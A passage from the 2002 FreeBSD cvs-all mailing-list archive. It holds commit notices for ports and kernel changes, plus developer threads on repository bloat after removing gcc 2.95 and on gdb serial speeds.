pkg-plist Log: Update to 0.18.0. Revision Changes Path 1.28 +3 -3 ports/graphics/gdk-pixbuf/Makefile 1.15 +1 -1 ports/graphics/gdk-pixbuf/distinfo 1.18 +3 -0 ports/graphics/gdk-pixbuf/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 21:40:37 2002 Delivered-To: cvs-all@freebsd.org Received: from rover.village.org (rover.bsdimp.com [204.144.255.66]) by hub.freebsd.org (Postfix) with ESMTP id 6808E37B40B; Tue, 18 Jun 2002 21:40:34 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.3/8.11.3) with ESMTP id g5J4eXY42328; Tue, 18 Jun 2002 22:40:33 -0600 (MDT) (envelope-from imp@village.org) Received: from localhost (warner@rover2.village.org [10.0.0.1]) by harmony.village.org (8.11.6/8.11.6) with ESMTP id g5J4eQG39664; Tue, 18 Jun 2002 22:40:31 -0600 (MDT) (envelope-from imp@village.org) Date: Tue, 18 Jun 2002 22:40:19 -0600 (MDT) Message-Id: <20020618.224019.68305939.imp@village.org> To: cjclark@alum.mit.edu, crist.clark@attbi.com Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/etc/mtree BSD.include.dist src/include Makefile src/usr.sbin/wicontrol wicontrol.c From: "M. Warner Losh" In-Reply-To: <20020618161445.A18051@blossom.cjclark.org> References: <20020618145717.A12206@blossom.cjclark.org> <20020618.170056.69350171.imp@village.org> <20020618161445.A18051@blossom.cjclark.org> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Yea, I checked -current before sending off my answer, but when I realized my mistake and checked -stable a few minutes later, it stood out like a sore thumb. Thanks for the good, if not gruff, catch. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 22: 6:41 2002 Delivered-To: cvs-all@freebsd.org Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id A674737B404; Tue, 18 Jun 2002 22:06:34 -0700 (PDT) Received: from bde.zeta.org.au (bde.zeta.org.au [203.2.228.102]) by mailman.zeta.org.au (8.9.3/8.8.7) with ESMTP id PAA22605; Wed, 19 Jun 2002 15:06:31 +1000 Date: Wed, 19 Jun 2002 15:11:19 +1000 (EST) From: Bruce Evans X-X-Sender: bde@gamplex.bde.org To: "David O'Brien" Cc: Kris Kennaway , , Subject: Re: Repo bloat (Re: cvs commit: src/contrib/gcc.295 BUGS COPYING COPYING.LIB ChangeLog FREEBSD-Xlist FSFChangeLog INSTALL LANGUAGES Makefile.in NEWS ONEWS PROBLEMS PROJECTS README README-bugs README-f In-Reply-To: <20020618123500.A2849@dragon.nuxi.com> Message-ID: <20020619150545.Q7664-100000@gamplex.bde.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 18 Jun 2002, David O'Brien wrote: > > Please, people! > > 1. you've forgotten *.295 will totally disappear soon (as in not even in > the Attic, totally gone as if it never, ever existed). It shouldn't even have been cvs removed yet, since the -mprofiler-epilogue bits haven't been merged int gcc yet. I appreciate all the work you have done maintaining gcc and friends, but the xxx - xxx.29x split has been a total disaster. After removing *.29x we won't even have repo bloat^W^Wall the commit history in places where it is hard to read. > 2. in general people seem to not care about repo bloat anymore -- not > when disk sizes are what they are. 56K modems haven't gotten any faster lately. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 22:35:27 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3073337B412; Tue, 18 Jun 2002 22:35:17 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J5ZHH95034; Tue, 18 Jun 2002 22:35:17 -0700 (PDT) (envelope-from dougb) Message-Id: <200206190535.g5J5ZHH95034@freefall.freebsd.org> From: Doug Barton Date: Tue, 18 Jun 2002 22:35:17 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/etc rc.devfs X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dougb 2002/06/18 22:35:17 PDT Modified files: etc rc.devfs Log: Another good suggestion from Bruce, only create links if the file doesn't exist already. Revision Changes Path 1.12 +2 -2 src/etc/rc.devfs To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 22:38:48 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3DE0D37B400; Tue, 18 Jun 2002 22:38:46 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J5ckx95219; Tue, 18 Jun 2002 22:38:46 -0700 (PDT) (envelope-from obrien) Message-Id: <200206190538.g5J5ckx95219@freefall.freebsd.org> From: "David E. O'Brien" Date: Tue, 18 Jun 2002 22:38:46 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/gnu/lib/libstdc++ Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/18 22:38:45 PDT Modified files: gnu/lib/libstdc++ Makefile Log: Disconnect the docs until we figure out if there are any with v3. Revision Changes Path 1.35 +1 -1 src/gnu/lib/libstdc++/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 22:42:42 2002 Delivered-To: cvs-all@freebsd.org Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id 7953A37B40A; Tue, 18 Jun 2002 22:42:36 -0700 (PDT) Received: from bde.zeta.org.au (bde.zeta.org.au [203.2.228.102]) by mailman.zeta.org.au (8.9.3/8.8.7) with ESMTP id PAA27753; Wed, 19 Jun 2002 15:42:33 +1000 Date: Wed, 19 Jun 2002 15:47:21 +1000 (EST) From: Bruce Evans X-X-Sender: bde@gamplex.bde.org To: Nick Hibma Cc: cvs-committers@FreeBSD.org, Subject: Re: cvs commit: src/sys/pc98/pc98 sio.c src/sys/conf options options.i386 options.ia64 options.pc98 src/sys/dev/sio sio.c sioreg.h In-Reply-To: <200206182130.g5ILUbI13355@freefall.freebsd.org> Message-ID: <20020619153032.X7788-100000@gamplex.bde.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 18 Jun 2002, Nick Hibma wrote: > n_hibma 2002/06/18 14:30:37 PDT > > Modified files: > sys/pc98/pc98 sio.c > sys/conf options options.i386 options.ia64 > options.pc98 > sys/dev/sio sio.c sioreg.h > Log: > Make the speed used by gdb over serial settable in the kernel configuration. > > This facilitates the use in circumstances where you are using a serial > console as well. GDB doesn't support anything higher than 9600 baud (19k2 > if you are lucky), but the console does. Previous version reviewed by: bde I seem to have missed the main point of this change. I always use gdb at 115200 bps on i386's (since I don't have anything faster), but haven't used it recently. Not working at a low speed like 115200 is a bug somewhere. The buffering by the low level console driver (none) is not very suitable for input faster than a human can type, and gdb certainly sends input faster than tha in bursts when it sends a packet, but problems seem to be limited by the protocol being very simple. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 22:43:34 2002 Delivered-To: cvs-all@freebsd.org Received: from dragon.nuxi.com (trang.nuxi.com [66.92.13.169]) by hub.freebsd.org (Postfix) with ESMTP id 6CA8337B410; Tue, 18 Jun 2002 22:43:26 -0700 (PDT) Received: from dragon.nuxi.com (obrien@localhost [127.0.0.1]) by dragon.nuxi.com (8.12.3/8.12.2) with ESMTP id g5J5hPP8014059; Tue, 18 Jun 2002 22:43:26 -0700 (PDT) (envelope-from obrien@dragon.nuxi.com) Received: (from obrien@localhost) by dragon.nuxi.com (8.12.4/8.12.3/Submit) id g5J5hO7A014058; Tue, 18 Jun 2002 22:43:24 -0700 (PDT) Date: Tue, 18 Jun 2002 22:43:24 -0700 From: "David O'Brien" To: Bruce Evans Cc: Kris Kennaway , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: Repo bloat (Re: cvs commit: src/contrib/gcc.295 BUGS COPYING COPYING.LIB ChangeLog FREEBSD-Xlist FSFChangeLog INSTALL LANGUAGES Makefile.in NEWS ONEWS PROBLEMS PROJECTS README README-bugs README-f Message-ID: <20020618224324.A14019@dragon.nuxi.com> Reply-To: obrien@FreeBSD.org Mail-Followup-To: David O'Brien , Bruce Evans , Kris Kennaway , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org References: <20020618123500.A2849@dragon.nuxi.com> <20020619150545.Q7664-100000@gamplex.bde.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020619150545.Q7664-100000@gamplex.bde.org>; from bde@zeta.org.au on Wed, Jun 19, 2002 at 03:11:19PM +1000 X-Operating-System: FreeBSD 5.0-CURRENT Organization: The NUXI BSD group X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Rsa-Keyid: 1024/34F9F9D5 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wed, Jun 19, 2002 at 03:11:19PM +1000, Bruce Evans wrote: > > 1. you've forgotten *.295 will totally disappear soon (as in not even in > > the Attic, totally gone as if it never, ever existed). > > It shouldn't even have been cvs removed yet, since the -mprofiler-epilogue > bits haven't been merged int gcc yet. All the commits to contrib/gcc.295 where committed into contrib/gcc before the 3.1 import. (that is not strictly true, as Kris's format hacks weren't, but he knew they would not be) What part of history is missing from contrib/gcc? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 22:46:47 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 13ABE37B40F; Tue, 18 Jun 2002 22:46:42 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J5kft96146; Tue, 18 Jun 2002 22:46:41 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206190546.g5J5kft96146@freefall.freebsd.org> From: Ying-Chieh Liao Date: Tue, 18 Jun 2002 22:46:41 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics/ivtools Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/18 22:46:41 PDT Modified files: graphics/ivtools Makefile Log: add imake dependence unbreak PR: 39315 Submitted by: maintainer Revision Changes Path 1.3 +2 -1 ports/graphics/ivtools/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 23: 2:14 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B6B5337B408; Tue, 18 Jun 2002 23:02:03 -0700 (PDT) Received: (from alc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J623Q97778; Tue, 18 Jun 2002 23:02:03 -0700 (PDT) (envelope-from alc) Message-Id: <200206190602.g5J623Q97778@freefall.freebsd.org> From: Alan Cox Date: Tue, 18 Jun 2002 23:02:03 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm vm_map.c vm_object.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alc 2002/06/18 23:02:03 PDT Modified files: sys/vm vm_map.c vm_object.c Log: o Replace GIANT_REQUIRED in vm_object_coalesce() by the acquisition and release of Giant. o Reduce the scope of GIANT_REQUIRED in vm_map_insert(). These changes will enable us to remove the acquisition and release of Giant from obreak(). Revision Changes Path 1.255 +2 -2 src/sys/vm/vm_map.c 1.217 +8 -6 src/sys/vm/vm_object.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 23: 4:42 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AE5B337B40D; Tue, 18 Jun 2002 23:04:37 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J64bJ98033; Tue, 18 Jun 2002 23:04:37 -0700 (PDT) (envelope-from obrien) Message-Id: <200206190604.g5J64bJ98033@freefall.freebsd.org> From: "David E. O'Brien" Date: Tue, 18 Jun 2002 23:04:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/include stdbool.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/18 23:04:37 PDT Modified files: include stdbool.h Log: Guard definitions for use with C++ code. Submitted by: Ed Hall Revision Changes Path 1.5 +5 -1 src/include/stdbool.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 23: 5:34 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5DAC437B400; Tue, 18 Jun 2002 23:05:26 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J65Qb01949; Tue, 18 Jun 2002 23:05:26 -0700 (PDT) (envelope-from obrien) Message-Id: <200206190605.g5J65Qb01949@freefall.freebsd.org> From: "David E. O'Brien" Date: Tue, 18 Jun 2002 23:05:26 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/include stdbool.h X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/18 23:05:26 PDT Modified files: (Branch: RELENG_4) include stdbool.h Log: MFC: rev 1.5 (add guard for C++) Revision Changes Path 1.4.2.2 +4 -0 src/include/stdbool.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 23:31:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6BC9337B40C; Tue, 18 Jun 2002 23:31:47 -0700 (PDT) Received: (from ade@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J6Vlm05379; Tue, 18 Jun 2002 23:31:47 -0700 (PDT) (envelope-from ade) Message-Id: <200206190631.g5J6Vlm05379@freefall.freebsd.org> From: Ade Lovett Date: Tue, 18 Jun 2002 23:31:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/gettext Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ade 2002/06/18 23:31:47 PDT Modified files: devel/gettext Makefile distinfo pkg-plist Log: Update to 0.11.2 PR: 39481 Submitted by: Ports Fury Revision Changes Path 1.32 +3 -3 ports/devel/gettext/Makefile 1.5 +1 -1 ports/devel/gettext/distinfo 1.21 +3 -3 ports/devel/gettext/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 23:39: 4 2002 Delivered-To: cvs-all@freebsd.org Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id 9E86D37B400; Tue, 18 Jun 2002 23:38:59 -0700 (PDT) Received: from bde.zeta.org.au (bde.zeta.org.au [203.2.228.102]) by mailman.zeta.org.au (8.9.3/8.8.7) with ESMTP id QAA03580; Wed, 19 Jun 2002 16:38:49 +1000 Date: Wed, 19 Jun 2002 16:43:37 +1000 (EST) From: Bruce Evans X-X-Sender: bde@gamplex.bde.org To: "David O'Brien" Cc: Kris Kennaway , , Subject: Re: Repo bloat (Re: cvs commit: src/contrib/gcc.295 BUGS COPYING COPYING.LIB ChangeLog FREEBSD-Xlist FSFChangeLog INSTALL LANGUAGES Makefile.in NEWS ONEWS PROBLEMS PROJECTS README README-bugs README-f In-Reply-To: <20020618224324.A14019@dragon.nuxi.com> Message-ID: <20020619161947.Q7952-100000@gamplex.bde.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 18 Jun 2002, David O'Brien wrote: > On Wed, Jun 19, 2002 at 03:11:19PM +1000, Bruce Evans wrote: > > > 1. you've forgotten *.295 will totally disappear soon (as in not even in > > > the Attic, totally gone as if it never, ever existed). > > > > It shouldn't even have been cvs removed yet, since the -mprofiler-epilogue > > bits haven't been merged int gcc yet. > > All the commits to contrib/gcc.295 where committed into contrib/gcc > before the 3.1 import. (that is not strictly true, as Kris's format > hacks weren't, but he knew they would not be) At least the -mprofiler-epilogue bits in config/i386/i386.c are missing. Actually they seem to be only missing from the HEAD. That is almost OK. The format hacks should be treated sparately, at least if we are going to totally remove the old bits for them. > What part of history is missing from contrib/gcc? Perhaps not a lot, since most of it went missing before gcc.295. We have removed all the old history of gcc except possibly from releases cdroms and other backups. I only have 3 versions of i386.c,v online -- the ones in FreeBSD-1, gcc.295 and the current one. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 23:39:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B099D37B404; Tue, 18 Jun 2002 23:39:25 -0700 (PDT) Received: (from alfred@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J6dPs05938; Tue, 18 Jun 2002 23:39:25 -0700 (PDT) (envelope-from alfred) Message-Id: <200206190639.g5J6dPs05938@freefall.freebsd.org> From: Alfred Perlstein Date: Tue, 18 Jun 2002 23:39:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sys ucred.h src/sys/kern kern_exec.c kern_prot.c src/sys/alpha/osf1 osf1_misc.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alfred 2002/06/18 23:39:25 PDT Modified files: sys/sys ucred.h sys/kern kern_exec.c kern_prot.c sys/alpha/osf1 osf1_misc.c Log: Squish the "could sleep with process lock" messages caused by calling uifind() with a proc lock held. change_ruid() and change_euid() have been modified to take a uidinfo structure which will be pre-allocated by callers, they will then call uihold() on the uidinfo structure so that the caller's logic is simplified. This allows one to call uifind() before locking the proc struct and thereby avoid a potential blocking allocation with the proc lock held. This may need revisiting, perhaps keeping a spare uidinfo allocated per process to handle this situation or re-examining if the proc lock needs to be held over the entire operation of changing real or effective user id. Submitted by: Don Lewis Revision Changes Path 1.31 +6 -2 src/sys/alpha/osf1/osf1_misc.c 1.165 +4 -1 src/sys/kern/kern_exec.c 1.158 +40 -14 src/sys/kern/kern_prot.c 1.35 +2 -2 src/sys/sys/ucred.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 23:55:36 2002 Delivered-To: cvs-all@freebsd.org Received: from van-laarhoven.org (ap-z-5ab8.adsl.wanadoo.nl [212.129.218.184]) by hub.freebsd.org (Postfix) with SMTP id 16F5937B407 for ; Tue, 18 Jun 2002 23:55:29 -0700 (PDT) Received: (qmail 3523 invoked from network); 19 Jun 2002 06:55:27 -0000 Received: from uitsmijter.van-laarhoven.org (10.66.0.1) by uitsmijter.van-laarhoven.org with SMTP; 19 Jun 2002 06:55:27 -0000 Date: Wed, 19 Jun 2002 08:55:26 +0200 (CEST) From: Nick Hibma To: Bruce Evans Cc: "cvs-committers@FreeBSD.org" , "cvs-all@FreeBSD.org" Subject: Re: cvs commit: src/sys/pc98/pc98 sio.c src/sys/conf options options.i386 options.ia64 options.pc98 src/sys/dev/sio sio.c sioreg.h In-Reply-To: <20020619153032.X7788-100000@gamplex.bde.org> Message-ID: <20020619084551.E3498-100000@uitsmijter.van-laarhoven.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > > This facilitates the use in circumstances where you are using a serial > > console as well. GDB doesn't support anything higher than 9600 baud (19k2 > > if you are lucky), but the console does. > > Previous version reviewed by: bde > > I seem to have missed the main point of this change. I always use gdb > at 115200 bps on i386's (since I don't have anything faster), but > haven't used it recently. Not working at a low speed like 115200 is > a bug somewhere. The buffering by the low level console driver (none) > is not very suitable for input faster than a human can type, and gdb > certainly sends input faster than tha in bursts when it sends a packet, > but problems seem to be limited by the protocol being very simple. I've had a look at the gdb code that reads the input from the port and from that I can't see why gdb would choke on reading from the port. I use a 686 class machine, so it should be well fast enough to handle the port, but anything above 19k2 gives me either spurious or permanent timeouts. Hence the change. Nick -- n_hibma@van-laarhoven.org http://www.van-laarhoven.org/ n_hibma@FreeBSD.org http://www.etla.net/~n_hibma/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 0: 9:53 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AC06437B401; Wed, 19 Jun 2002 00:09:44 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J79id16454; Wed, 19 Jun 2002 00:09:44 -0700 (PDT) (envelope-from tjr) Message-Id: <200206190709.g5J79id16454@freefall.freebsd.org> From: "Tim J. Robbins" Date: Wed, 19 Jun 2002 00:09:44 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/env env.c src/usr.bin/printenv printenv.1 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/19 00:09:44 PDT Modified files: usr.bin/env env.c usr.bin/printenv printenv.1 Log: Indicate that env(1) allows you to supply arguments to the utility it executes in the usage() message and manual page. Use "utility" instead of "command" in both places to emphasise that shell builtins etc. will not work, and to be consistent with the terminology used by POSIX. PR: 39210 Submitted by: Danny J. Zerkel MFC after: 1 week Revision Changes Path 1.9 +1 -1 src/usr.bin/env/env.c 1.14 +7 -7 src/usr.bin/printenv/printenv.1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 0:42:23 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3D84637B401; Wed, 19 Jun 2002 00:42:20 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J7gKX28091; Wed, 19 Jun 2002 00:42:20 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206190742.g5J7gKX28091@freefall.freebsd.org> From: Ying-Chieh Liao Date: Wed, 19 Jun 2002 00:42:19 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/lang/guile Makefile distinfo pkg-descr pkg-plist ports/lang/guile/files patch-af X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/19 00:42:19 PDT Modified files: lang/guile Makefile distinfo pkg-descr pkg-plist Removed files: lang/guile/files patch-af Log: upgrade to 1.4.1 Revision Changes Path 1.29 +8 -4 ports/lang/guile/Makefile 1.6 +1 -1 ports/lang/guile/distinfo 1.2 +0 -17 ports/lang/guile/files/patch-af (dead) 1.4 +2 -0 ports/lang/guile/pkg-descr 1.12 +10 -7 ports/lang/guile/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 0:50:43 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 97B7F37B40E; Wed, 19 Jun 2002 00:50:37 -0700 (PDT) Received: (from blackend@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J7obW29414; Wed, 19 Jun 2002 00:50:37 -0700 (PDT) (envelope-from blackend) Message-Id: <200206190750.g5J7obW29414@freefall.freebsd.org> From: Marc Fonvieille Date: Wed, 19 Jun 2002 00:50:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/books/handbook/install chapter.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG blackend 2002/06/19 00:50:37 PDT Modified files: en_US.ISO8859-1/books/handbook/install chapter.sgml Log: s/null-modem cable/null modem cable/ in Index PR: docs/38905 Submitted by: Marc Fonvieille Approved by: keramida Revision Changes Path 1.200 +1 -1 doc/en_US.ISO8859-1/books/handbook/install/chapter.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Wed Jun 19 1:16:18 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DF48A37B405; Wed, 19 Jun 2002 01:16:14 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5J8GE036027; Wed, 19 Jun 2002 01:16:14 -0700 (PDT) (envelope-from tjr) Message-Id: <200206190816.g5J8GE036027@freefall.freebsd.org> From: "Tim J. Robbins" Date: Wed, 19 Jun 2002 01:16:14 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/printf printf.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/19 01:16:14 PDT Modified files: usr.bin/printf printf.c Log: Allow `%' to be written out with an octal escape (\45 or \045). PR: 39116 Submitted by: Egil Brendsdal MFC after: 1 week Revision Changes Path 1.22 +5 -1 src/usr.bin/printf/printf.c To Unsubscribe: send mail to 